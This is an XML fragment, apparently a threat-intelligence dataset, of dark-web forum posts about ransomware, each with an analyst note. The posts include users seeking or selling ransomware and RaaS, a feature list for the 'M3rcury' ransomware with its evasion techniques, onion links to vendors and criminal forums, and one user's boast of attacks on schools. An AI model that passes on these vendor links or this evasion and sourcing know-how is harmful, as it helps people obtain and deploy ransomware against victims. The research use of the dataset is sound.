http://deepdot35wvmeyd5.onion/2018/10/14/kelihos-botnet-operator-pleads-guilty-to-id-trading-on-darkweb/</t>
  </si>
  <si>
    <t>Article on the sentencing of Botnet operator, notable as he also implimented ransomware on various victims</t>
  </si>
  <si>
    <t>14/10/2018 21:39</t>
  </si>
  <si>
    <t>e03f561727fe92cbe7fb</t>
  </si>
  <si>
    <t>Kelihos Botnet Operator Pleads Guilty to ID Trading On Darkweb.</t>
  </si>
  <si>
    <t>hello does anyone have builder of kronos malware in return will give a sample of my ransomware</t>
  </si>
  <si>
    <t>User asking for Kronos botnet builder in exchanged for his ransomware</t>
  </si>
  <si>
    <t>/u/ElJalali</t>
  </si>
  <si>
    <t>29/04/2020 20:18</t>
  </si>
  <si>
    <t>736b306ee7debcf7ceae</t>
  </si>
  <si>
    <t>Kronos banking botnet</t>
  </si>
  <si>
    <t>0 days 11:25:00</t>
  </si>
  <si>
    <t xml:space="preserve">;the los angeles unified school district (lausd) has created a hotline after personally identifiable information of students, faculty and staff started being posted on the dark web. the ransomware group ���vice society��� had set a monday deadline for paying the ransom. but, perhaps in an attempt to further embarrass the school district, the ransomware group decided to post thousands of files early on sunday, october 2nd.;;as first reported by nbc los angeles, lausd superintendent alberto carvalho announced the creation of the hotline for victims of the ransomware attack.;;the original breach occurred in september from the la unified school district���s computers. the data leaked includes personally identifiable information, confidential psychological assessments of students, legal documents, and databases.;;;lausd: playing with fire?;early on sunday, october 2nd, the lausd originally declined to make any statement on the leak of thousands of files now on the dark web by vice society. the laly pressed for acknowledgement and a response to the leak, and by 11:15am, carvalho shared the news of the hotline to all affected individuals.;;the lausd has remained adamant in public statements that they would not pay the ransom���as is recommended by law enforcement agencies like the federal bureau of investigations���as there is no guarantee paying the ransom would unencrypt the data and restore operations.;;���this level of demand was, quite frankly, insulting,��� carvalho commented on vice society���s demands.;;���paying ransom never guarantees the full recovery of data, and los angeles unified believes public dollars are better spent on our students rather than capitulating to a nefarious and illicit crime syndicate,��� carvalho continued.;;���and we���re not about to enter into negotiations with that type of entity,��� carvalho concludes.;;but, publicly refusing to pay the ransom in repeated public statements has seemed to antagonize the cybof intent.;;vice society responded in kind on sunday stating, ���cisa wasted our time, we waste cisa reputation,��� referring to the cybersecurity and infrastructure security agency.;;the comment was made next to a link to download the lausd file dump.;;the deadline expires by tonight for the ransom to be paid���and if not, we���ll likely see a full release of </t>
  </si>
  <si>
    <t xml:space="preserve">Article on LA school district publicly insulting Vice society ransomware gang after they breached their systems. They are refusing to pay the ransom </t>
  </si>
  <si>
    <t>/u/theArchitect</t>
  </si>
  <si>
    <t>384d8ad2e1ae0df04546</t>
  </si>
  <si>
    <t>LA School District is playing with fire as it continues to publicly insult ransomware gang Vice Society for breaching its systems and declining to pay</t>
  </si>
  <si>
    <t>reuters: exclusive governments turn tables on ransomware gang revil by pushing it offline.;https://www.reuters.com/technology/exclusive-governments-turn-tables-ransomware-gang-revil-by-pushing-it-offline-2021-10-21/</t>
  </si>
  <si>
    <t>Article stating Revil gang was pushed offline by law enforcement</t>
  </si>
  <si>
    <t>22/10/2021 18:13</t>
  </si>
  <si>
    <t>d043d1dbeb080d46d847</t>
  </si>
  <si>
    <t>LE hacks REvil</t>
  </si>
  <si>
    <t>1 days 01:37:00</t>
  </si>
  <si>
    <t>nsa def got involved</t>
  </si>
  <si>
    <t>/u/A1_</t>
  </si>
  <si>
    <t>22/10/2021 18:41</t>
  </si>
  <si>
    <t>revil:  http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion [1];;[1];/post/68b92df37896c14a81fc</t>
  </si>
  <si>
    <t>23/10/2021 19:39</t>
  </si>
  <si>
    <t>1 days 00:58:00</t>
  </si>
  <si>
    <t>thanks. this one looks dead. but rass is great</t>
  </si>
  <si>
    <t>23/10/2021 19:46</t>
  </si>
  <si>
    <t>this link was their "happy blog". it's since been taken down.</t>
  </si>
  <si>
    <t>23/10/2021 19:50</t>
  </si>
  <si>
    <t>can anyone share a legit place to purchase black hat guides like botnets , silent miners, ransomware etc. i am eager to learn black hat money methods. please comment below</t>
  </si>
  <si>
    <t>User asking for place to buy various blackhat guides, including ransomware</t>
  </si>
  <si>
    <t>/u/CypherTheThird</t>
  </si>
  <si>
    <t>e09788020d8775aa6f20</t>
  </si>
  <si>
    <t>Legit Marketplace</t>
  </si>
  <si>
    <t>4 days 22:24:00</t>
  </si>
  <si>
    <t>use recon and type what you want, there are many many botnets and ransomwares, but some are outdated, best is to see how it works and code your own once you understood.</t>
  </si>
  <si>
    <t>/u/Secondhandc99</t>
  </si>
  <si>
    <t>thank you for the comment bro! but isnt there any marketplace that i can advance my blackhat skills on?</t>
  </si>
  <si>
    <t>0 days 01:10:00</t>
  </si>
  <si>
    <t>idk, cryptbb maybe</t>
  </si>
  <si>
    <t>4 days 20:58:00</t>
  </si>
  <si>
    <t>1. malwarebytes is an anti-malware software for microsoft windows, macos, chrome os, android, and ios that finds and removes malware. free version available.;https://www.malwarebytes.com/premium;;;2. avast anti-virus;packed with the largest threat-detection network, antivirus that won���t slow down your pc. fast, lightweight and easy to use. scan your pc with one click. link to free version.;https://www.avast.com/en-us/lp-ppc-aone?ppc_code=012&amp;ppc=a&amp;gclid=cj0kcqia3fipbhccarisafq8qzwqjdvymcjta_g_jkleq5qgm0kvfts9wuv9wcatqix6qttq-8grrd4aajjqealw_wcb&amp;gclsrc=aw.ds;;;3. avira free antivirus;top antivirus: blocks spyware, adware, ransomware, etc.;real-time protection &amp; updates;light and fast: doesn���t slow down your pc;link to free version.;https://www.avira.com/en/free-antivirus-windows;;4. kaspersky�� security cloud ��� free;kaspersky security cloud free combines excellent malware protection, plenty of          extra features and a very light system-performance impact.;link to free version.;com/downloads/try-free-cloud-antivirus;;;5. avg antivirus free;malware protection, email shield, real-time updates, phishing protection.;link to free version.;https://www.avg.com/en-us/free-antivirus-download;;;all of the above have paid versions with more features.</t>
  </si>
  <si>
    <t>Dubious post providing information for anti-malware</t>
  </si>
  <si>
    <t>/d/Windows</t>
  </si>
  <si>
    <t>45d58f5908ac66cc2eea</t>
  </si>
  <si>
    <t>Let's get some protection</t>
  </si>
  <si>
    <t>1 days 03:12:00</t>
  </si>
  <si>
    <t>Vulcan ransomware group advertising themselves</t>
  </si>
  <si>
    <t>25/04/2022 09:45</t>
  </si>
  <si>
    <t>b0501e1e8a3a14d8a468</t>
  </si>
  <si>
    <t>Looking Affiliates | VulcanRansomTeam.</t>
  </si>
  <si>
    <t>title basically says it all, looking for tips or assistance on how i could make a solid btc sourced ransomware, i unfortunately just don't know where to start. any help is extremely appreciated, thanks!</t>
  </si>
  <si>
    <t>User asking information on how to make a btc ransomware</t>
  </si>
  <si>
    <t>/u/r33240</t>
  </si>
  <si>
    <t>1796ed2a9012e1e7760b</t>
  </si>
  <si>
    <t>Looking To Make A Badass Ransomware</t>
  </si>
  <si>
    <t>43 days 13:01:00</t>
  </si>
  <si>
    <t>well... i suppose you're very good at scripting, if not, you'll need to learn the shit out of it.;imagine it like this: you'll have to run a script that goes through every drive, folder and file of the infected pc and encrypting each of the target files (database, database backups).;so... yeah, that's "it". and the key to said encryption can't be on the script, obviously.;and you need to be able to unencrypt in case they pay the ransom. unless you don't really care, which would be douchy and make this sort of move less effective.</t>
  </si>
  <si>
    <t>/u/nakamotosama</t>
  </si>
  <si>
    <t>to make sophisticated ransomware, you'll need to know about the os you're targeting, how to create an executable type that is guaranteed to run on said os, how to design a basic anonymous distributed system, and cryptography. imagine if you tried to encrypt every file on a computer - you had total access - you'd end up encrypting essential drivers. something like this take an enormous amount of thought and months (possibly years) of work.</t>
  </si>
  <si>
    <t>/u/agent_smith</t>
  </si>
  <si>
    <t>0 days 06:02:00</t>
  </si>
  <si>
    <t>been checking out this juicy (and i mean juicy) new target, and i'm gonna go for some nice old ransomware. specifically looking for windows 10. anyone recommend any good vendors? any difference in experience from individual or dnm sellers?</t>
  </si>
  <si>
    <t>User asking for ransomware to attack a particular target</t>
  </si>
  <si>
    <t>29d6622b2146d3f4aa06</t>
  </si>
  <si>
    <t>Looking for Ransomware</t>
  </si>
  <si>
    <t>51 days 08:59:00</t>
  </si>
  <si>
    <t>are you looking for raas or a private build?</t>
  </si>
  <si>
    <t>0 days 04:34:00</t>
  </si>
  <si>
    <t>i've honestly never heard of raas, and i don't want to pretend i know what i'm talking about. can you expand on raas?</t>
  </si>
  <si>
    <t>0 days 07:18:00</t>
  </si>
  <si>
    <t>ransom as a service.;;meaning you purchase the ransomware you split the profits of payouts with the creator 60/40 or whatever it's setup to be</t>
  </si>
  <si>
    <t>0 days 16:02:00</t>
  </si>
  <si>
    <t>oh so i don't have to pay, and i just get profit for getting people to install it? i'd be interested.</t>
  </si>
  <si>
    <t>13/07/2020 12:09</t>
  </si>
  <si>
    <t>0 days 16:52:00</t>
  </si>
  <si>
    <t>no you would have to pay for the ransomware regardless it just depends on how much and which payout method you want to go.;;raas is cheaper whereas buying a private build will be 500+ usd</t>
  </si>
  <si>
    <t>13/07/2020 18:10</t>
  </si>
  <si>
    <t>0 days 06:01:00</t>
  </si>
  <si>
    <t>ranion works nice....;http://ranionjgot5cud3p.onion/;very cheap and works nicely.</t>
  </si>
  <si>
    <t>/u/DrDeath998</t>
  </si>
  <si>
    <t>15/08/2020 15:58</t>
  </si>
  <si>
    <t>32 days 21:48:00</t>
  </si>
  <si>
    <t>my guy! thank you!</t>
  </si>
  <si>
    <t>16 days 08:24:00</t>
  </si>
  <si>
    <t>xss, verified and exploit are currently best forums running;;ramp also, but is dedicated to ransomware only</t>
  </si>
  <si>
    <t>information on diffrent dark web forums, including ransomware</t>
  </si>
  <si>
    <t>20/05/2022 15:26</t>
  </si>
  <si>
    <t>66283c695ce5ccc1b0cb</t>
  </si>
  <si>
    <t>Looking for a Hacking Forum?</t>
  </si>
  <si>
    <t>9 days 22:31:00</t>
  </si>
  <si>
    <t>32 days 21:37:00</t>
  </si>
  <si>
    <t>hello;i have a scheme in the works to do a ransomware campaign. however idk the fuck i'm doing. can anybody point me to a how to on the subject or roughly break down what i need to learn to do for this to be successful? i feel like i understand that i need to setup a command and control server but i'm not sure what i actually need to install on whatever serverspace i rent or how i should go about configuring that for whatever ransomware i choose. any help would be much appreciated.;thanks</t>
  </si>
  <si>
    <t>User asking for information on how to learn ransomware</t>
  </si>
  <si>
    <t>/u/goonondeck</t>
  </si>
  <si>
    <t>27/03/2020 10:21</t>
  </si>
  <si>
    <t>c34fa9a400d8a0330728</t>
  </si>
  <si>
    <t>Looking for a ransomware how to</t>
  </si>
  <si>
    <t>4 days 03:36:00</t>
  </si>
  <si>
    <t>it would better to purchase ransomware yourself or pay into a  raas so you don't need to deal with the infrastructure.;;so if you have a way of spreading the malware yourself then purchase it and away you go.</t>
  </si>
  <si>
    <t>28/03/2020 09:24</t>
  </si>
  <si>
    <t>0 days 23:03:00</t>
  </si>
  <si>
    <t>{'ransomware': 1, 'raas': 1}</t>
  </si>
  <si>
    <t>you can buy the ransomware you need on darkcode:;http://darkcorqvqcj3p3g.onion/;it can run entirely offline, so you won't need a c&amp;c server, just an email address.;the malware documentation is public, so you can check it before you buy to make sure you can configure an attack easily.;i can also answer your questions by email.</t>
  </si>
  <si>
    <t>31/03/2020 13:57</t>
  </si>
  <si>
    <t>3 days 04:33:00</t>
  </si>
  <si>
    <t>hey. this is pdl. i am searching for a team of fellow hackers &amp; programmers.;;------------------------------------------------------------------------------------------------------------------------------;~information                                                                                                    ~;------------------------------------------------------------------------------------------------------------------------------;;objectives: learning from each other, &amp; making $$$;;looking for: people interested in hacking, with at least some experience in either programming, or practical attacks. it doesn't matter, as along as there's at least some experience!;;requirements: learn from the rest. teach the others.;;------------------------------------------------------------------------------------------------------------------------------;~my profile                                                                                                       ~;------------------------------------------------------------------------------------------------------------------------------;i've been programming professionally for ~7 years now. i mainly have experience in web development, python, and golang.;;i don't have too much experience in hacking, but i have pulled off a few attacks. here is some of my previous work, in order of profit.;;----1----spear phishing a medium-sized equipment ecommerce store. i was skimming cvvs for ~3 months. sold ~800 cvvs.;----2----dropping some malware i wrote, to a database admin at a private secondary school. i managed to grab an unencrypted student database with a shit load of fullz. sold only ~50 of those, due to age.;----3----creating a fake store front for "cheap electronics", and advertising it before christmas. only got ~20 cvvs. fail;----4----writing some custom ransomware, and infecting a fairly large school (they didn't pay.  fail);;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~;|                                                                                                                                                                 |;|   if anyone is interested in starting a team, contact me via pm, or jabber (x_d@riseup.net)   |;|                                                                                                                                                                 |;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~;;~pdl</t>
  </si>
  <si>
    <t>user looking for a collegue/parnership includign for ransomware</t>
  </si>
  <si>
    <t>potential hacker (group)</t>
  </si>
  <si>
    <t>19/09/2019 07:22</t>
  </si>
  <si>
    <t>329b5ac27f0f68c5825c</t>
  </si>
  <si>
    <t>Looking for a team/partnership. Beginner &lt;----&gt; Advanced</t>
  </si>
  <si>
    <t>13 days 14:42:00</t>
  </si>
  <si>
    <t>definetely interested tried to message but its not working</t>
  </si>
  <si>
    <t>/u/Makkavelli</t>
  </si>
  <si>
    <t>12 days 17:20:00</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</si>
  <si>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things related to salaries will be discussed in pm's.;;how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</si>
  <si>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15/03/2022 08:59</t>
  </si>
  <si>
    <t>/d/DNMAds</t>
  </si>
  <si>
    <t>1723ee89e5b976ec72ba</t>
  </si>
  <si>
    <t>Looking for affiliates | VulcanRansomTeam</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</si>
  <si>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amount.;;how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</si>
  <si>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17/03/2022 18:13</t>
  </si>
  <si>
    <t>0b6ab09025d3a459f341</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</si>
  <si>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payment;;how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</si>
  <si>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22/03/2022 17:29</t>
  </si>
  <si>
    <t>7a9cfad2c18ee56947a1</t>
  </si>
  <si>
    <t>spread your own ransomware...</t>
  </si>
  <si>
    <t>User critising Vulcan, telling them to spread their own ransomware</t>
  </si>
  <si>
    <t>/u/Heinous</t>
  </si>
  <si>
    <t>31/03/2022 08:13</t>
  </si>
  <si>
    <t>/d/Jobs4Crypto</t>
  </si>
  <si>
    <t>0cc3f65190ab4c5ae43d</t>
  </si>
  <si>
    <t>0 days 10:42:00</t>
  </si>
  <si>
    <t>i think mods don't like lockers. we didn't want to take any risk of getting banned from the platform.;;your question:- "your previous jobs were ??";we did the same thing what we are doing right now. ransomware.;;have a nice day!</t>
  </si>
  <si>
    <t>31/03/2022 17:16</t>
  </si>
  <si>
    <t>0 days 09:03:00</t>
  </si>
  <si>
    <t>ade36926a77bdee8556c</t>
  </si>
  <si>
    <t>13 days 18:14:00</t>
  </si>
  <si>
    <t>how is your search for people going? i notice you post this fairly often is why i ask.</t>
  </si>
  <si>
    <t>Vulcan ransomware group advertising themselves - user asks how is it going due to their repeated asking</t>
  </si>
  <si>
    <t>25/04/2022 04:28</t>
  </si>
  <si>
    <t>13 days 13:00:00</t>
  </si>
  <si>
    <t>not so great. got banned from many subdreads.;thanks for asking.</t>
  </si>
  <si>
    <t>Vulcan ransomware group advertising themselves - group mentions poorly due to being banned off many subdreads</t>
  </si>
  <si>
    <t>25/04/2022 09:42</t>
  </si>
  <si>
    <t>0 days 05:14:00</t>
  </si>
  <si>
    <t>99fb65e2253ca3b34b83</t>
  </si>
  <si>
    <t>55 days 12:25:00</t>
  </si>
  <si>
    <t>i recognize most of this text from another ransomware group, maybe it's a copy paste maybe i'm tripping.</t>
  </si>
  <si>
    <t>/u/Akar</t>
  </si>
  <si>
    <t>20/05/2022 17:45</t>
  </si>
  <si>
    <t>18 days 08:43:00</t>
  </si>
  <si>
    <t>im a fullstack coder, partime i put on my black hat and use my skills to make some extra coin.;;so, not long ago i decided to set up a portal for stealing email logins.;the portal worked like a charm and fetched me the login credentials of 88 email addreses (mainly gmail);;now im looking to exploit these logins.;an obvious thing to do is; log into each account and send ransomware to al warm contacts of that account (terrific clickrate).;;but there must be more that i can do..;please enlighten me, what methods would you use to squeeze the most money out of a hacked email account ?</t>
  </si>
  <si>
    <t>fullstack coder (occasionally blackhat) asking how to make the most money from stolen email accounts (mentioned ransomware an on option)</t>
  </si>
  <si>
    <t>/u/purplebrain</t>
  </si>
  <si>
    <t>eee2f31191652d038dfa</t>
  </si>
  <si>
    <t>Looking for creative ways to exploit EMAIL accounts</t>
  </si>
  <si>
    <t>1 days 04:50:00</t>
  </si>
  <si>
    <t>not just ransom, send own coded spyware, malware, adware whatever you can or some specific malware to do something, such as keyloggs, screenshots, screenrecorder, botnetting, bots for mining that are plenty you can do dude if you are that good :))))</t>
  </si>
  <si>
    <t>please send me a message if you have built ransomware and are looking to sell. thanks;;�����������</t>
  </si>
  <si>
    <t>User asking to buy ransomware</t>
  </si>
  <si>
    <t>/u/goshabitch</t>
  </si>
  <si>
    <t>24/10/2020 03:44</t>
  </si>
  <si>
    <t>677d959c4b1483e9cc9d</t>
  </si>
  <si>
    <t>Looking for ransomware</t>
  </si>
  <si>
    <t>21 days 00:37:00</t>
  </si>
  <si>
    <t>please send me a message if you build ransomware. thanks;;�����������</t>
  </si>
  <si>
    <t>24/10/2020 03:49</t>
  </si>
  <si>
    <t>649af031e1a87706746d</t>
  </si>
  <si>
    <t>9 days 14:37:00</t>
  </si>
  <si>
    <t>hi, i'm looking for a simple ransomware (subscription is ok  for me);choosing os, choosing extension, btc address, time pending etc;fud of course;;i can't find one on telegram or exploit;;can someone tell me where i can purchase/rent a good one ?;the ones one the darknet are trash and outdate</t>
  </si>
  <si>
    <t>User asking for ransomware subscription. mentioning they cannot find one</t>
  </si>
  <si>
    <t>/u/pierre669</t>
  </si>
  <si>
    <t>13bd9d5d9ee65992d6b3</t>
  </si>
  <si>
    <t>Looking for ransomware subscription</t>
  </si>
  <si>
    <t>" the ones one the darknet are trash and outdated";wat;;anyways some very valid ones are ranion or securedataprotector, check out;/d/hacktown;'s armory to get the links.;also there should be someone selling raas on cryptbb too.</t>
  </si>
  <si>
    <t>you can find sellers on our forum cryptbb.;for example ranion, they offer reputable raas.;;url: hxxp://ranionv3j2o7wrn3um6de33eccbchhg32mkgnnoi72enkpp7jc25h3ad[dot]onion/;;you can get a 10% discount if you are a member at cbb, so here's the thread:;/showthread.php?tid=183</t>
  </si>
  <si>
    <t>/u/BGrabbit</t>
  </si>
  <si>
    <t>0 days 00:34:00</t>
  </si>
  <si>
    <t>exploit and xss have banned all ransomwares after collonial pipeline;to quote ar3s 'i dont want all users of the forum to be targeted by forein secret agencies because of actions of 5-6 teams', and then exploit did statement which is almost copy paste;;;on telegram, if you find, you can find only scams and script kiddies;;ramp is the only forum where ransomware groups are actively recruiting;also through some private contacts;;;;if you have materials, and corp acceses and you know your stuff  about network pentesting, i can push to get you in avos or lockbit</t>
  </si>
  <si>
    <t>User asking for ransomware subscription. mentioning they cannot find one. This post mentions exploit and xss have banned ransomware after colonal pipeline attack</t>
  </si>
  <si>
    <t>{'lockbit': 1, 'ransomware': 1}</t>
  </si>
  <si>
    <t>to contact the seller, look for "feather-lite" on cyptbb!;;-------------------------------------------------------------------------------------------------------;the m3rcury ransomware is a ransomware written entirely from scratch, which uses a unique multi-pass piecewise encryption mechanism for evade anti-ransomware;;features;;removal of backups (shadow copies and other backups);;hybrid rsa aes-256 encryption;;uac bypass;;sandbox detection;;evasion of heuristic analysis;;heavy obfscuation;;single file decryption to get victim trust;;encryption mechanism to defeat anti-ransomware detection;;working on windows 10 and 7 is currently undergoing furthur testing;;;whats new in 1.4?;;custom runtime packer/crypter using manual memory mapping for maximum stealth.;;all builds are unique;;payload is shredded after payload runs;;unhooks it self from many common hooked functions;;;encryption mechanism:;m3rcury goes through all files on the system and encrypts only part of them. then it goes through all files again and again until all are fully encrypted. this is useful for evading anti-ransomware because it will have encrypted many more files before detected as opposed to a traditional ransomware. it also causes more damage faster as critical information of a file is often near the header.;;what you will recieve;;attacker side decryption source code written in golang;copy of the main ransomware executable in both 32 and 64 bit;your unique private key for victim decryption;access to all future updates!;;;note: this is not raas you recieve 100% of your ransoms! smile once fully paid;;payload size is 1.8 mib;;pricing;��� 123/ $ 150 usd;or:;pay and initial ��� 50 and become a temporary affiliate;;accept monero and btc but monero is alot preferred;;you can contact us via pm;;please use our pgp key to communicate;;update roadmap:;v1.5 stealth update:;;encryption optimizations;runtime crypting;expand av evasion;reduced binary size;;;v2.0 corprate update:;;spread over network;linux version;windows 8 support;greatly reduced binary size;features which target corprat;after 2.0;;mac os version;email spread;automated file exfiltration;info steal module;6502 assembly version</t>
  </si>
  <si>
    <t>M3rcury ransomware group advertising themselves</t>
  </si>
  <si>
    <t>23433bd8f842adf94611</t>
  </si>
  <si>
    <t>M3rcury - FUD advanced ransomware - ��� 50 | New versio</t>
  </si>
  <si>
    <t>make money! create a ransomware for around $1000 ransom, crypt it, give me the dl(executable in a .rar) link and wait for the money to roll in! i need this asap.;;if i get multiple people i will choose at random.;;edit: i do not need this anymore.</t>
  </si>
  <si>
    <t>user asking for ransomware under the guide of wishing to spread it for free</t>
  </si>
  <si>
    <t>/u/groincoin</t>
  </si>
  <si>
    <t>115dde6c3cbe33128298</t>
  </si>
  <si>
    <t>MAKE MONEY! Create a ransomware...</t>
  </si>
  <si>
    <t>40 days 23:54:00</t>
  </si>
  <si>
    <t>this is a pretty roundabout way of saying, "can somebody give me some ransomware, i'll pay for it".</t>
  </si>
  <si>
    <t>its all in the benefit of the ransomware provider, i just spread the executable for free!;;edit: i suggest they put the ransom around $1k</t>
  </si>
  <si>
    <t>where do you profit</t>
  </si>
  <si>
    <t>/u/PelicanVendor</t>
  </si>
  <si>
    <t>they have coin on their pc that i will withdraw before i execute.;;edit: still need this asap. a $1k ransom will be paid</t>
  </si>
  <si>
    <t>0 days 10:26:00</t>
  </si>
  <si>
    <t>still need this, hmu asap!</t>
  </si>
  <si>
    <t>1 days 10:52:00</t>
  </si>
  <si>
    <t>how do you spread it or do you have multiple techniques? just curious bro. wouldn't spreading it be free anyways for the provider unless you did have multiple methods? i'm a little to curious maybe. that part of my brain i just cannot itch. is your provider fucking lazy? tell em to rent a botnet.</t>
  </si>
  <si>
    <t>/u/drabmax</t>
  </si>
  <si>
    <t>30 days 17:51:00</t>
  </si>
  <si>
    <t>how do you withdraw before executing?</t>
  </si>
  <si>
    <t>spreading would be free, but with this attack it would have been a guaranteed profit for the provider. i have limited physical access to the computer so it would be spread through usb. unfortunately i dont think i will be able to be able to pull off this attack anytime soon.</t>
  </si>
  <si>
    <t>15/01/2019 15:36</t>
  </si>
  <si>
    <t>6 days 04:15:00</t>
  </si>
  <si>
    <t>hello all. i have ransomware, botnets, atm malware and even advanced worm viruses. i wish to rent them out. these are some of the malwares/viruses i have.;;hiddenwasp;atmitch;suceful;revil;driveslayer;xenomorph;etc etc;;monthly rate is from $500 lowest to $2.5k (for each malware/virus);;i will give you access to a server and thus api. any attempt to circumvent the period of lease.;or reverse the api, will be met with a strike. 3 strikes and your banned.;;please note, i only use session app to communicate;heres my id for session app;053ddec0c20c0f12e8d9b14925dbb770fe8c63006f4b17b172ff2f62035a70140b;there you go. enter that, when after you press the plus sign. next to where it says;messages.;then enter the long string into where it says session id.;and wait for me to reply.;;thanks all, for reading this. and i hope we can do business.;;made a slight mistake in the title. meant to say for rent lease. anyway, have a good day. and stay safe</t>
  </si>
  <si>
    <t>user selling various things including ransomware</t>
  </si>
  <si>
    <t>potential hacker (individual) / raas provider (individual)</t>
  </si>
  <si>
    <t>/u/GENESISOFYOUROMEGA</t>
  </si>
  <si>
    <t>13/05/2022 15:15</t>
  </si>
  <si>
    <t>ae2cce66476e33ceb397</t>
  </si>
  <si>
    <t>MALWARES/VIRUSES FOR SALE</t>
  </si>
  <si>
    <t>what about any raas sites? (for a beginner)</t>
  </si>
  <si>
    <t>user asking for a link to any raas development forums</t>
  </si>
  <si>
    <t>/u/iop123</t>
  </si>
  <si>
    <t>c53880c9c8c3ef01f7fb</t>
  </si>
  <si>
    <t>Malware development forums</t>
  </si>
  <si>
    <t>1 days 06:13:00</t>
  </si>
  <si>
    <t>10 days 05:07:00</t>
  </si>
  <si>
    <t>idk if this is the right subdread because i only seem to find people looking for drugs lol, but i can't seem to find any markets where i can buy stuff like ransomware and rats. any suggestions?</t>
  </si>
  <si>
    <t>User asking where they can buy ransomware</t>
  </si>
  <si>
    <t>/u/yowaddup69</t>
  </si>
  <si>
    <t>23/01/2022 19:31</t>
  </si>
  <si>
    <t>/d/DNMSourcing</t>
  </si>
  <si>
    <t>b0bfacd00d29d0bc5cfc</t>
  </si>
  <si>
    <t>Malware?</t>
  </si>
  <si>
    <t>2 days 16:20:00</t>
  </si>
  <si>
    <t>just look it up on recon.</t>
  </si>
  <si>
    <t>/u/OGK</t>
  </si>
  <si>
    <t>24/01/2022 17:43</t>
  </si>
  <si>
    <t>0 days 22:12:00</t>
  </si>
  <si>
    <t>get on cybersec forums, you'll have a much better selection, prices, quality, and support.</t>
  </si>
  <si>
    <t>26/01/2022 11:51</t>
  </si>
  <si>
    <t>1 days 18:08:00</t>
  </si>
  <si>
    <t>i agree, but their premium version is far superior.;;;https://ibb.co/krhbjjc;;it offers protection with a web blacklist, malware protection, ransomwear protection, exploit protection, and even now includes;rdp protection;. i run this along with webroot secure anywhere as my main av, and then i also bought a copy of;zonealarm anti-ransomwear;for my father, since he runs a small business, and it came with like 3 or 5 systems you could run it on, so i put it on mine and my mother's computer as well.</t>
  </si>
  <si>
    <t>Post mentioned anti-ransomware protection</t>
  </si>
  <si>
    <t>/u/BetterOffDead</t>
  </si>
  <si>
    <t>16/12/2021 23:01</t>
  </si>
  <si>
    <t>246c6118b75b8de5ed00</t>
  </si>
  <si>
    <t>Malwarebytes 50% off (NO AFFILIATE LINK)</t>
  </si>
  <si>
    <t>1 days 14:39:00</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;cybercriminals published for sale in dark web 58gb of data stolen from hollingsworth llp.;;source: security affairs;;one of the emerging underground marketplaces of stolen data ���marketo��� available in tor network announced the publication of data presumably stolen from hollingsworth llp, one of the largest u.s.-based law firms.;;the information about the new victim of ransomware activity first has been published on telegram channel of threat actors 7:14 am pacific standard time (pst). ���it is not the first time, when cybercriminals are attacking law firms and organizations involved in legal services. such enterprises typically aggregate large volumes of sensitive data belonging to their clients in face of businesses and individuals. cyberespionage activity is often targeted on this vertical, and ransomware groups follow the same path to profit from data theft. ���marketo��� is known for attacking enterprises where the data leak will be criti said gene yoo, chief executive officer of resecurity, inc., a los angeles-based cybersecurity company hunting on dark web actors.;;before the publication of listing of files exfiltrated from hollingsworth llp, ���marketo��� have published a data set presumably belonging to the clearfield borough police department (pennsylvania) and the municipal court of princeton (west virginia) in ���vip section���. according to the description, 28 gb of stolen data includes ���appeal letters, accounting and audit information, amendment documents, information on taxes, on the clients��� agreements, assets and chats���. the motivation behind these cyberattacks remains unclear. ���the u.s. judicial system will finally fly off in terms of security��� ��� comment added by actors behind ���marketo��� in one of the postings.;;last year, another ransomware gang known as ���revil��� attacked the new york-based firm, grubman shire meiselas &amp; sacks, t includes more than 200 high-profile celebrities, including elton john, rod stewart, lil nas x, the weekend and u2, as well as major corporations like facebook, sony, hbo and iheartmedia. the threat actors stole over 756 gb of data from their network and threatened to release it in case the company won���t pay them.;;earlier this year, in february, the clop ransomware group posted data apparently stolen from law firm jones day, which represents many of the globe���s most powerful people, including former president donald trump in his efforts to overturn the 2020 election. jones day, which represented trump, said the breach was part of the accellion campaign when the threat actors exploited a previously unknown remote code execution vulnerability in a file transfer sharing service. another law firm, goodwin procter llp was also compromised as a result of the accellion breach. several other multinational companies which use the accellion file transfer service have also been compromised, including tm carrier singtel and australian telecom company optus.;;cybercriminals behind ���marketo��� activity position themselves as operators of an organized ���marketplace of stolen data��� and not as a typical ransomware group distributing malicious code to disrupt it operations by blocking the network of the victim and by encrypting available files on various data storage.;;one of the unique features provided by ���marketo��� ��� the ability to ���bid��� on stolen data, which obviously creates competition between parties interested in data acquisition including the end victim. for today, the marketplace has over 3,248 registered users participating in it. highly likely the threat actors use it as one of the tactics to add additional pressure on the victim company, because unknown third parties, including competitors or other cybercriminals, may buy their data and leverage it for malicious purposes. there are already 71 ���bids��� submitted for hollr victims published on ���marketo��� include siemens gamesa renewable energy, american signal corporation, line energy, navistar, homewood health, the city university of new york and over 45 other organizations.;;the fbi is requesting $40 million in additional funding for its fiscal 2022 budget to help combat and counter ransomware attacks and other cyberthreats, director christopher wray told a u.s. senate subcommittee this week. in testimony wednesday at a hearing of the senate appropriations committee���s commerce, justice, science, and related agencies subcommittee, wray said the fbi needs the extra funds to address cybercrime, ransomware and vari</t>
  </si>
  <si>
    <t xml:space="preserve">Article mentioning how ransomware groups are targeting ransomware groups are increasingly targeting law firms such as hollingsworth to which they released leasked data. </t>
  </si>
  <si>
    <t>30/06/2021 18:01</t>
  </si>
  <si>
    <t>42566d5bff353ec7de57</t>
  </si>
  <si>
    <t>Marketo Marketplace - Cybercriminals are Targeting Major Law Firms</t>
  </si>
  <si>
    <t>the ransomware operators of revil have reportedly established an ebay-like dark web site to auction stolen data.;;revil, also referred to as sodinokibi, is a ransomware outfit that targets corporate networks through the employment of remote systems, spam, system exploits and compromised service providers.;;the operators have been known to apply an organized mechanism of gaining administrative access to target domain controllers before they move on to employ the ransomware in encrypting the systems on a target network.;;sometime in the beginning of this year, the ransomware operators are reported to have publish a data leak platform that would be used to expose a victim���s data in case they failed to meet the specified ransom conditions. the site, called ���happy blog���, was created for publishing samples of the victim���s data, which would be used to threaten targets with release of the entire stolen dump.;;in the past, the days that followed a data breach were marked with the publishe website in order to allow external cybercriminals to use it for free.;;in the latest cyber case involving revil, it is said that the stolen data is associated with a 